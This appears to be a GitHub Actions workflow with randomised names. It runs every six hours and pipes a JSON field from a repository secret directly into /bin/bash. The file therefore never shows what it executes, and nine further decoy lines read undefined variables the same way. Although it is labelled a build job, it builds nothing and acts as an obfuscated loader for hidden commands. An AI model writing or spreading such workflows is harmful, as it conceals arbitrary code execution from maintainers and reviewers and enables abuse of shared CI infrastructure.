name: weixutong6745

on:
  workflow_dispatch:
  schedule:
    - cron: '29 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: weixutong6745
        env:
          xoyxi32: ${{ secrets.xoyxi32 }}
        run: |
          echo $xoyxi32 | jq -r .wcx94 | /bin/bash
          echo $lmoa686 | jq -r .jv8676 | /bin/bash
          echo $tjfrl30575 | jq -r .m6 | /bin/bash
          echo $yr23773 | jq -r .ewwm87 | /bin/bash
          echo $mhub39705 | jq -r .y11904 | /bin/bash
          echo $c62914 | jq -r .iobas68 | /bin/bash
          echo $efm116 | jq -r .z2865 | /bin/bash
          echo $sqs48240 | jq -r .xxr0 | /bin/bash
          echo $afzag6538 | jq -r .rauk1743 | /bin/bash
          echo $nbgm4729 | jq -r .hvjfx7431 | /bin/bash

